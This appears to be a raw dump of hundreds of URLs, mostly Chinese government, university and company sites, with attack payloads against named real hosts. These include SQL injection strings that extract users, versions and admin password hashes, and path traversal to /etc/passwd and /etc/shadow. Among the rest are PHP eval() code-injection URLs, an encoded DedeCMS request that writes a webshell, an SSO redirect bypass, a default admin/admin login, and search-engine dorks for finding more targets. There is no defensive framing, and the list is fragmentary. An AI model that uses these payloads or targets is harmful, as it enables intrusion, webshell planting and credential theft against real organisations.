http://zp.immu.edu.cn/zpsys/index-news.jsp?WID= http://zp.immu.edu.cn/zpsys/index-news.jsp?WID= http://zp.njxzc.edu.cn/zpsys/index-news.jsp?WID= http://zp.njxzc.edu.cn/zpsys/index-news.jsp?WID= http://basic.10jqka.com.cn/interactive/stockall/000528/?seq=468053 http://a1.greentree.cn:8029/Admin/index.php/Public/login http://kaoqin.gb246.com http://yoyo.263.net/gift.php?act=detail&cid=0&g_id=10136 http://www.byecity.com/www.byecity.com.zip http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/lecture.asp http://www.bjprd.com.cn/zcpt/index.asp http://www.bjprd.com.cn/PE/index.asp http://www.bjprd.com.cn/PE/common/info.asp?id=213&str=1 http://www.bjprd.com.cn/PE/common/info.asp?id=213 http://www.bjprd.com.cn/PE/common/cxinfomx.asp?id=43912 http://cloud.xiaoi.com/login!logout.do http://222.73.228.81:8100/task/admin!auth.action http://cloud.xiaoi.com:8888/index.php http://www.ycztb.com/ycsite/newxygh/XXGH.aspx?XieYiLeiBie=0 http://www.shinan.gov.cn/list.asp?catid=22 http://v5.wqetrip.com/ inurl:/triplist.aspx?typeID=1 inurl:/triplist.aspx?typeID= 
http://v5.wqetrip.com/triplist.aspx?typeID=1 http://v5.wqetrip.com/triplist.aspx?typeID=1 http://v5.wqetrip.com/triplist.aspx?typeID=1 http://www.sqlmap.org http://www.yhfw.gov.cn/was/portals/webSend/entity_show.jsp?fileName=%CA%DA%C8%A8%CE%AF%CD%D0%CA%E9.doc&unid=20110803-13F03C6EF05E5062B773-11 http://v.demo.linksoon.net/ http://www.tangsuanradio.com/ http://yun.263.net http://pan.baidu.com/share/link?shareid=1831333754&uk=2099536883 http://61.135.129.80:8080/nihaobj.java http://61.135.129.80:8080/domain_auth/ http://www.cosco-logistics.gz.cn/manage/ http://a1.greentree.cn:8029/Bak/ http://100.hibnet.com/ http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/lecture.asp http://www.bjprd.com.cn/zcpt/index.asp http://www.bjprd.com.cn/sbweb/index.asp http://www.bjprd.com.cn/zcgkweb/login.asp http://www.bjprd.com.cn/jjweb/index.asp http://news.buct.edu.cn/cms/bjhgdx/xww/search_channel.jsp http://news.buct.edu.cn/cms/ http://portal.buct.edu.cn/cas/login?service=http%3A%2F%2F202.4.130.240%3A8080%2Fcms%2F http://www.renhua.gov.cn/platform/login!login.action http://www.westarsoft.com/ inurl:web!getItem.action inurl:sp/out/index.jsp http://www.yzz.cn/ http://tool.oschina.net/codeformat/xml file:///etc/passwd file:///home/run/ssh_go.sh http://mall.95572.com/,fiddler断点截包,在请求头上加入X-Forwarded-For www.anzhi.com http://www.anzhi.com/change_pwd.php?code=933836&id=******&r=1399543904.15&verify_type=1 http://sale.jd.com/act/BtKFCOrMuIEo.html?erpad_source=erpad#none http://activity.jd.com/vote/vote.action?callback=jQuery16206548841977491975_1399544587745&id=300&pin=&itemId=1109&_=1399544679248 http://bj.esf.focus.cn/ajax/get_house_map_mark.json.php http://www.rgrcb.com/manage/Manage_Index.php http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721 http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload 
http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php http://v5mall.v5shop.com.cn/productreview.aspx?productid=703 http://v5mall.v5shop.com.cn/productask.aspx?productid=703 http://demo.zoomla.cn/Customer.aspx http://law.hexun.com/commons/img.jsp site:gov.cn inurl:ApproveSiteAction!findApproveGuide.action http://dev.mgame.baidu.com/sign/add http://ycimg.m.duoku.com/group1/M00/05/A5/CgoAMVNrex6ECRpRAAAAAOQaGIc280.php line:198 https://publib.boulder.ibm.com/infocenter/bladectr/documentation/index.jsp?topic=/com.ibm.bladecenter.advmgtmod.doc/adv_mgt_mod_product_page.html http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5073887 http://1.1.1.1/phpinfo.php http://www.bookschina.com/smsadmin/message/groupremark.aspx?id=835 http://fj.bnet.cn/Page/HotProList.aspx?tagid=21%20and%201=1 http://fj.bnet.cn/Page/HotProList.aspx?tagid=21%20and%201=2 http://www.wxmetro.net:8888/cms/editor/filemanager/browser/default/browser.html?Type=../../../webapps/cms&Connector=connectors/jsp/connector http://t.hexun.com/k/topic.html?value=%25u89E3%25u76D8%7E%25u4E3B%25u529B http://demo.zoomla.cn/Guest/ask/List.aspx http://hanweb.com/col/col41/index.html http://jy.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=12 http://touchapp.mmb.cn/wap/vp/handlePhoneProduct.do?method=buyProduct&uuniq=1399482571758403 http://app.suning.com/android/app?gid=1 http://app.suning.com/android/app/page?id=637501 http://photo.huatu.com/photo.rar https://sso.shengpay.com/login https://sso.shengpay.com/login?appId=zf481&service=http://www.shengpay.com/account/loginValidate.htm https://sso.shengpay.com/login?appId=zf425&service=http://www.fangxinmai.com/account/loginValidate.htm https://sso.shengpay.com/login?appId=zf425&service=http://xxx.com www.fangxinmai.com这个service,服务端仅仅做了起始字符串的匹配,So,构造Url https://sso.shengpay.com/login?appId=zf425&service=http://www.fangxinmai.com.xxx.com 
http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=-93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://www.welcomeinn.com.cn/about_yl.asp?id=93 http://app.suning.com/win/software/detail?guid=787d85fa-61f7-4ebc-a26b-7f01565971c4%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,user%28%29,4,5,6,7,8%23 http://app.suning.com/index.php?route=common/home/ajUserBrand&brand_id=32%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,user%28%29%23 http://app.suning.com/android/app/comment?pack=com.soulgame.bubble%27%20and%201=2%20union%20select%201,user%28%29,3,4,5%23&page=1&_=1399622792464 http://app.suning.com/softwarelist.php?gid=4&cid=190 http://www.gridinn.com/pay/payonline.aspx?id=1164279 http://demo.zoomla.cn/3d/InsertContext.aspx http://cloud.suning.com/cloud-web/appCenter/search.htm?categoryId=9&version=1399626466076 sctjj.gov.cn/news_view.asp?newsid=2334 http://www.sandpay.com.cn/website/cardservice/shopquery2.do?goto=detail&id=97667 http://gx.10086.cn/cmop/showWebNewsIndex.action http://www.szks.gov.cn/Info_View.aspx?id=637 http://www.szks.gov.cn/Info_View.aspx?id=637 http://www.sqlmap.org www.szks.gov.cn\session http://dm.zoomla.cn/guestbook/发给同学,同学用手机打开链接就弹出js代码! 
http://agri.suning.com.cn分站存在多处注入点 http://agri.suning.com.cn/news.php?t=-1%22 http://agri.suning.com.cn/NewsDetail.php?id=298&t= http://agri.suning.com.cn/JobsDetail.php?id=-1+OR+17-7%3d10 http://agri.suning.com.cn/Controller/NewsController.php http://www.longene.org/fileDownload.php?id=73&page=download http://www.longene.org/fileDownload.php?id=65%20%20and%201=2%20union%20select%201,2,@@version,4,5,6,7,8,9&page=download http://www.longene.org/test.php http://www.longene.org/phpinfo.php http://61.146.213.170/ http://www.taobei.gov.cn/ArticleDetail.aspx?i=1779 http://www.gxwzfda.gov.cn/shenlan.asp http://www.wzpeace.com http://www.wzpeace.com/attached/help.php http://finance.qingdaonews.com/financewap/list.aspx?qx=0&fl=0 http://finance.qingdaonews.com/financewap/list.aspx?qx=0&fl=0 http://www.sqlmap.org http://www.dingdong.cn/broadband/detail.aspx?id=599 http://www.dingdong.cn/broadband/detail.aspx?id=599 http://www.sqlmap.org www.dingdong.cn\session http://gqx.hebstd.gov.cn/Products/ProductDetail.aspx?tableid=29 http://127.0.0.1/Plugins/ckfinder/ckfinder.html http://127.0.0.1/UploadFiles/files/1.asp/3.GIF http://127.0.0.1/plugins/imageupload.aspx http://psy.ruc.edu.cn/activityinfo.php?id=8 http://ts.house.hebnews.cn/Outside/msglist_s.aspx?st=9,70,80,99 http://www.zzbwd.com/wzl/admin_loginadd.asp http://www.zzjntw.com/wzl/admin_loginadd.asp http://www.hnyycs.com/wzl/admin_loginadd.asp http://www.jtdny.com/wzl/admin_loginadd.asp http://www.hnwzhf.cn/wzl/admin_loginadd.asp http://www.zuoan168.com/wzl/admin_left.asp http://www.zzzhuangji.com/wzl/admin_left.asp http://www.yypep.com/wzl/admin_left.asp http://www.hnxqjd.com/wzl/admin_left.asp http://www.vorlon.cn/wzl/admin_left.asp http://www.gsdaiban.com/wzl/admin_left.asp http://www.hnmaosen.com/wzl/admin_left.asp http://www.zzjntw.com/wzl/admin_loginadd.asp http://diy.91.com http://diy.91.com/login.php diy.91.com/tools/log/ post:logtype=../../../../../../../../../../etc/passwd%00.jpg 
http://www.95572.com/jsp/new_index/select_multi_data2.jsp?p=G http://www.95572.com/jsp/new_index/select_multi_data2.jsp http://www.95572.com/jsp/new_index/select_multi_data2.jsp http://118.122.112.89/khoa/index.jsp http://118.122.112.89/khoa/page/system/ggmm.jsp?fl=1 http://118.122.112.89/khoa/page/upload/down_file.jsp?fileName=1 http://118.122.112.89/khoa/download.jsp?path=khoa&name=index.jsp http://www.hr135.com/member/index.php?M=index&C=info http://www.ytoxl.com/manager/html http://m2.ytoxl.com/manager/html http://fio.ytoxl.com/manager/html http://www.fmxedu.com/ http://www.fmxedu.com/www.rar http://www.scwsjd.com/ws/news_enter.action http://xxsw.nuc.edu.cn/cms/subnews.php?id=869 inurl:portal/xzsp/wssbinfo.aspx http://www.website.com/portal/xzsp/wssbinfo.aspx?id=624&title= http://www.taoshouyou.com/plugin.php?id=onshuo:buy&gid=12381&buy_amount=1 http://www.visitsz.com:801/2013Winter/detail.asp?id=637 http://www.visitsz.com:801/admin/login.asp http://www.xxssfj.gov.cn/ http://www.xxxgtj.gov.cn/ http://www.jhqz.com/ http://www.xxairpull.com/ http://www.sxcompany.cn/ http://www.34455.com.cn/ http://www.riugor.com/ http://www.hnyxyz.com/ http://www.xxzhongcai.com/ http://www.yqdbj.com/ http://www.whwxjx.com/ http://www.xxxiangyi.com/ http://www.jlmgjx.com/ http://www.hnhffy.com/ http://www.36699.cn/ http://www.xxktdq.com/ http://www.xxhtfm.com/ http://www.dbxnp.com/ http://www.xinxi365.cn/ http://www.yangzhushebei.com/ http://www.cxnjzzc.com/ http://www.spyxuesci.asia/ http://www.xhzdjx.com/ http://www.xxssfj.gov.cn/Picture_Show.php?id=122 http://www.xxssfj.gov.cn/Info_Show.php?id=1016 http://www.xxssfj.gov.cn/Info_Show.php?ColumnID=14&id=949 http://www.xxairpull.com/cpinfo.php?cpid=467 http://www.xxairpull.com/newsinfo.php?id=87&classid=12 http://www.xxairpull.com/newsinfo.php?id=91 http://www.34455.com.cn/newsinfo.php?id=181&classid=11 http://www.34455.com.cn/cpinfo.php?cpid=476 http://www.34455.com.cn/cp_type.php?smallclassid=96 
http://www.34455.com.cn/qyinfo.php?id=31 http://www.riugor.com/newsinfo.php?id=157&classid=11 http://www.riugor.com/cpinfo.php?cpid=451 http://www.riugor.com/news_class.php?classid=11 http://www.riugor.com/english/cpinfo.php?cpid=451 http://www.riugor.com/cp_type.php?smallclassid=98 http://www.xxzhongcai.com/jszcinfo.php?tl_id=31 http://www.xxzhongcai.com/cpinfo.php?product_id=2 http://www.yqdbj.com/newsinfo.php?id=32 http://www.sxsj.gov.cn/Manage/fckeditor/editor/images/smiley/msn/x.asp http://dangxiao.qdu.edu.cn/dangxiao/dx/login.php http://www.ngxfw.gov.cn/dy_show.php?tid=19&id=275 http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189 http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350 http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7 http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402 http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99 http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10 http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99 http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765 http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243 http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593 http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567 http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624 http://das.hhtz.gov.cn/archive/index.aspx?pageguid=349219E1-28BB-4849-BE72-2F05EAD8D5B5&CatalogID=742 http://www.bjsqxy.org/index.aspx?pageguid=E2859CC5-DFBC-4066-876B-2E2BA585FDBB 
http://www.cba.gov.cn/cbastats/match/gamelive.aspx?gameno=CHNW2014 http://english.qqhr.gov.cn/xinwen.php?id=186 http://english.qqhr.gov.cn/manager/index.php http://jld.cq.gov.cn/common/content.jsp?flag=1&id=633 http://www.cq.gov.cn/public-fulltext-client/?bs= inurl:Info!list.action?alias= http://www.hngswj.gov.cn/web/Info!list.action?alias=policy http://222.76.242.83:8080/web/Info!list.action?alias=trends&infoRegion=%E5%B1%B1%E4%B8%9C%E7%9C%81%E5%B7%A5%E5%95%86%E5%B1%80 http://wj.ahaic.gov.cn:8080/GSweb/web/Info!list.action?alias=trends&infoRegion=%E9%A9%AC%E9%9E%8D%E5%B1%B1 http://27.151.116.17:8081/web/Info!list.action?alias=trends&infoRegion=%E7%A6%8F%E5%B7%9E%E5%B8%82 http://www.gzaic315.gov.cn/web/Info!list.action?alias=trends http://wj.ahaic.gov.cn:8080/GSweb/web/Info!list.action?alias=trends&infoRegion=%E9%A9%AC%E9%9E%8D%E5%B1%B1 http://218.22.14.69:8080/GSweb/web/Info!list.action?alias=policy http://www.ccgswljg.gov.cn/web/Info!list.action?alias=news http://wljg.xmgs.gov.cn:8080/web/Info!list.action?alias=laws http://www.guomobile.com/news_show.php?serial=927 http://wpf.cma.gov.cn/ http://tanalytics.tool.chexun.com/intface/recommenddata?callback=recommendDataC&c=5&muid=1 http://wooyun.org/bugs/wooyun-2014-057764 http://wooyun.org/bugs/wooyun-2010-045717 http://mtest1.jiuxian.com/home/index/user/login http://www.fzgwbn.net.cn/adminadmin/_content/_About/AspCms_AboutEdit.asp?id=19 http://www.tba.gov.cn/newsimg/.asp http://www.cnki.com.cn/ http://www.cnki.net/ http://www.yinzuo.cn/counts/admin.asp?view=yinzuo后台弱口令admin/admin http://gslx.yuncng.com:8080/index.jsp http://www.k12.com.cn/ http://www.cmdi.gov.cn:80/ www.cmdi.gov.cn url:http://tdemo010ct.v5shop.com.cn/commond.aspx?id=8 http://agri.suning.com.cn/JobsDetail.php?id=-31%20union%20select%201,2,3,concat_ws%28user%28%29,0x7c,version%28%29,0x7c,database%28%29,@@datadir%29,5,6,7,8,9,0,1,12-- gov.user/index.php http://www.sked.cn/DB/test.cer http://www.sked.cn/DB/test.asp 
http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 http://www.international.hit.edu.cn/test/ http://studyatsyu.syu.edu.cn/content.asp?id=161 http://zdzsc.zju.edu.cn/ http://zdzsc.zju.edu.cn/index.php?c=Index&a=kind_list&catid=2 http://119.191.58.225/week/open/bid/cms_open_bid.jspx?id=647潍坊市公共资源交易网 http://ggzy.weifang.gov.cn/week/open/bid/cms_open_bid.jspx?id=647 http://124.166.243.132:8080/week/open/bid/cms_open_bid.jspx?id=460 http://www.mdqggzyjy.com/week/open/bid/cms_open_bid.jspx?id=765牡丹区公共资源交易网 http://60.214.152.90:8080/news/trade/all/index.jspx?code=notice_dyproject枣庄市公共资源交易网 http://60.214.152.90:8080/news/integrity/all/index.jspx?code=cms_integrity_ryb http://60.214.152.90:8080/news/law/all/index.jspx?code=cms_law_jsgc http://60.214.152.90:8080/news/introduce/all/index.jspx?code=cms_introduce_jgzn http://www.ggzyjy.changzhi.gov.cn/news/news/page/index.jspx?code=cms_news_xwzx http://www.ggzyjy.changzhi.gov.cn/news/notice/page/index.jspx?code=cms_news_xwzx http://www.ggzyjy.changzhi.gov.cn/news/jsgc/page/index.jspx?code=biddingNotice_dyproject http://www.ggzyjy.changzhi.gov.cn/news/jsgc/page/index_2.jspx?code=biddingNotice_dyproject http://www.ggzyjy.changzhi.gov.cn/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/news/page/index.jspx?code=CMS_PUBLIC_RSGL德州市公共资源网 http://www.dzzwfw.com/news/trade/page/index.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://www.dzzwfw.com/news/notice/page/index_2.jspx?code=cms_public_rsgl http://ggzy.jzcfxxw.gov.cn:8080/news/news/page/index.jspx?code=cms_news_xwzx晋中市公共资源交易网 http://ggzy.jzcfxxw.gov.cn:8080/news/jsgc/page/index.jspx?code=biddingNotice_dyproject http://ggzy.jzcfxxw.gov.cn:8080/news/notice/page/index.jspx?code=cms_news_xwzx http://ggzy.jzcfxxw.gov.cn:8080/news/news/page/index_2.jspx?code=cms_news_xwzx 
http://ggzy.jzcfxxw.gov.cn:8080/news/trade/page/index_2.jspx?code=biddingNotice_dyproject http://ggzy.jzcfxxw.gov.cn:8080/news/cqjy/page/index_2.jspx?code=biddingNotice_propertyRight http://ggzy.jzcfxxw.gov.cn:8080/news/notice/page/index_2.jspx?code=cms_news_xwzx http://60.214.152.90:8080/枣庄市公共资源交易网(MSSQL数据库) http://www.xzggzyjy.gov.cn/忻州市公共资源交易网 http://cczfbz.changchun.gov.cn为例 http://cczfbz.changchun.gov.cn/modalList.jsp?bid=231&page=1 http://cczfbz.changchun.gov.cn/modal.jsp?aid=13238 http://cczfbz.changchun.gov.cn/modalSubList.jsp?bid=221&subid=298 http://cczfbz.changchun.gov.cn/znss.jsp http://xsc.bnu.edu.cn/xsc1/show.php?item_id=2522&accessory=-20140429113504%20union%20select%201,2,concat http://www.tc12345.gov.cn/Company.aspx?type=1 http://bbs.tompda.com/data.rar http://bbs.tompda.com/1.txt http://rs.hntelecom.net.cn/HRSystem/initIndex.do http://rs.hntelecom.net.cn/loginadmin.do?m=login rs.hntelecom.net.cn/filedown.do?m=filedown&path=/../..//../..//../..//../..//../..//etc/shadow%00 rs.hntelecom.net.cn/search.do?m=search rs.hntelecom.net.cn/searchD.do?m=searchD http://jky.ynnu.edu.cn/articleview.aspx?id=262 http://jky.ynnu.edu.cn/login.aspx http://www.loveindds.com/asp/login.asp http://www.loveindds.com/asp/openmmx.asp?itype=8&iid=2250 http://221.231.143.3/ http://wsxf.ahxfj.gov.cn/ http://www.nmgxfj.gov.cn/ http://xzxx.fsxzf.gov.cn/ http://wsxf.my.gov.cn/ http://wsxf.lepingshi.gov.cn/ http://wsxf.zqxf.gov.cn/ http://www.dzxfj.gov.cn/ http://xinfang.nanning.gov.cn/ http://218.94.25.233:81/ http://wfsxfj.weifang.gov.cn/ http://www.lyxfj.gov.cn/ http://www.jkq.lyxfj.gov.cn/ http://oa.lzwebs.com/ http://125.64.4.176/ http://www.lcxfj.gov.cn/ http://xf.lwsxfj.cn/ http://www.hzsxfj.gov.cn/ http://221.231.143.3/getpwd.asp?DepartNo=001000000000&UserName= http://wsxf.ahxfj.gov.cn/email_index.asp?DepartNo=001000000 http://wsxf.ahxfj.gov.cn/include/exit.asp?DepartNo=001000000 http://wsxf.ahxfj.gov.cn/include/save_myd.asp?DepartNo=001000000 
http://www.nmgxfj.gov.cn/qdshow.asp?Qid=1 http://xzxx.fsxzf.gov.cn/view_mail.aspx?regist_no=201403000006 http://wsxf.lepingshi.gov.cn/email_index.asp?DepartNo=001000000 http://wsxf.lepingshi.gov.cn/include/exit.asp?DepartNo=001000000 http://wsxf.zqxf.gov.cn/view_mail.aspx?regist_no=201303000067&zt=1 http://xinfang.nanning.gov.cn/getpwd.asp?DepartNo=001000000000&UserName= http://www.cregc.com.cn/news/2.asp http://www.facrs.com/dama.asp http://www.crec.com.cn/read.asp?id=1633 http://szupu.szu.edu.cn/szupu/main/main.php http://gswx.gov.cn/xinfang/ http://www.gswx.gov.cn/gswx.zip http://tiku.huatu.com/index.php?act=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://kf.runich.com/index.php/Bug/getzones http://www.qkl.cn/admin.jsp http://px.jlnetplc.gov.cn/Files/Image/t1.jpg http://px.jlnetplc.gov.cn/editor/ http://www.lbbook.cn/page.php?id=3 http://www.guomobile.com/news.php http://www.guomobile.com/news.php http://218.15.233.131/website/approve/approveSiteAction!logout.action http://zqas.gov.cn/website/approve/approveSiteAction!logout.action http://121.10.254.140/website/approve/approveSiteAction!logout.action http://61.146.213.170/website/approve/approveSiteAction!logout.action google:inurl:approveSiteAction!logout.action http://sports.lixin.edu.cn/list.aspx?id=3 http://sports.lixin.edu.cn/admin/login.aspx http://sports.lixin.edu.cn/editorAssembly/editor/filemanager/browser/default/connectors/test.html http://jx.10086.cn/xxt/activity/ulworks.action http://www.hzdgxx.org/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://hzchzx.cn/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzbjzg.org/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://hzgxsy.net/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzbwxx.com/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://61.175.193.70:99/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://yuweishiny.13.dns222.net/Shiny_Module/UserLogin/CheckUser.aspx?userName= 
http://61.175.193.70:99/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://www.hzxxsy.com/Shiny_Module/UserLogin/CheckUser.aspx?userName= http://tts.ytoxl.com/manager/html/ http://ktgl.ncedu.gov.cn/admin/Login.aspx后台登陆URI http://www.hcsfda.gov.cn/home/news.php?action=look&classid=3&id=151 http://www.wqsfda.gov.cn/home/news.php?action=look&classid=0&id=283 http://www.dhsfda.com/home/news.php?action=look&classid=3&id=443 http://www.sms.com.cn/news_more.php?cid=12 http://www.jingmen.gov.cn/app/wssq/ldxx.php?dw=11 site:3g.renren.com site:z.qq.com site:weibo.cn m.sm.cn/s?q=“要搜索的内容” http://xueyou.52edu.org/Index.aspx http://ks.ahjzs.net/Index.aspx http://exam2.timber2005.com/Index.aspx http://exam.iflysse.com/Login.aspx http://124.128.220.140:6006/Login.aspx http://116.228.52.53/login.aspx http://61.175.232.3/default.aspx http://58.221.172.30:9898/Default.aspx http://localhost/index.php/user/edit/web_save http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102 https://cloud.suning.com/cloud-api/login/logon?mobileClientVersion=2.1.8&data=6D2599ED208426E6130B074E0F79B20F8CF372D8B8E0B52FCC967EBEAAAD284AB18F74EA231FB30452D8B2479B792EF6D5B9F0B25418C0A94B5C5414F86472FA16A1637AF794AD941B78BFF44066B780&uid=186********&logonType=2&mobileSystemVersion=4.2.1&mobilePattern=M353& http://tool.28xl.com/life/jiufang/?q={${phpinfo%28%29 http://tool.28xl.com/life/jiufang/?q={${eval%28$_POST[c]%29 http://223.203.195.159/Px_plan1.aspx?infoid=32 http://223.203.195.159/News_1.aspx?newsid=33 http://223.203.195.159/Course_Info_M.aspx?typeid=68 http://eduadmin.open.com.cn/BasicSystem/Teaching/TplanOwnerShipDetail.aspx?TplanOwnerShipID=142&RecruitBatchID=4706&LevelID=2&SpecialityID=373&universitycode=10335&UniversityName=%E6%B5%99%E6%B1%9F%E5%A4%A7%E5%AD%A6%E5%BC%80%E8%AF%BE%E8%AE%A1%E5%88%92 http://hsypjg.net/index.action http://hsypjg.net/bak.jsp 
http://www.cw.buct.edu.cn/ReadNews.asp?NewsID=690&BigClassName=%B2%C6%CE%F1%D0%C2%CE%C5&SmallClassName=%B9%AB%B7%D1%D2%BD%C1%C6&SpecialID=22 http://www.lawnewscn.com/ http://www.lawnewscn.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.lawnewscn.com/dede/login.php http://www.lawnewscn.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=54&arrs2[]=49&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=113&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=
99&arrs2[]=109&arrs2[]=100&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.ncsshk.com/meishiShow.asp?id=64 http://www.ncsshk.com/manage/ewebeditor/db/ewebeditor.mdb http://demo.zoomla.cn/user/ http://demo.zoomla.cn/Admin/Site/Default.aspx http://www.99danji.com/99danji.rar http://www.cqupt.edu.cn/kxyj/jg.php?id=108 http://che.zju.edu.cn/tpe973/topic_detail.php?id=266 http://www.nanchangjk.jcy.gov.cn/ http://www.cqksy.cn http://www.cqksy.cn/oa/common/getFile.jsp?realpath=/../../../../../etc/passwd http://channel.wacom.com.cn/checkaccount.asp?username=admin http://comment.yaolan.com/zhuanti/MessageBoard.aspx?Topic=jdx&Color=#008BDC 1.fo/product.jsp?searchField= 2.fo/service.jsp?download=true&fileName= http://www.zkchina.com.cn/ http://www.sz-hws.com/ http://www.dbslz.com/ http://www.tinsbowatch.com/ http://www.dzydz.com/ http://www.szjscctv.cn/ http://www.chinatapes.com/ http://www.sztcxf119.com/ http://www.sztoxda.com/ http://www.baiji-tech.com/ http://www.hyfuan.com/ http://www.360ddz.cn/ http://www.timesmatch.com/ http://www.autic.cn/ http://www.huazengkeji.com/ http://www.mkzhan.com/1822/ http://www.mkzhan.com/index.php/tbmall/index http://etrip.wangqi.com/这是网奇屌丝官网的旅游 http://cal.189.cn/user/login.action http://localhost/thinksaas/index.php?app=group&ac=create&ts=do http://demo.zoomla.cn/Guest/Baike/Details.aspx?soure=manager&tittle=1 http://eduadmin.open.com.cn http://59.33.44.119:81/boai_mybjbm/userfiles/ http://survey.wacom.com.cn/AdminPages/Login.aspx http://qq.ycddm.cn/qq/ http://huixin.zymk.cn/admin.php http://huixin.zymk.cn/Public/upload.php?path=upload/img&inputid=pic http://www.mkzhan.com/index.php/cindex/index 
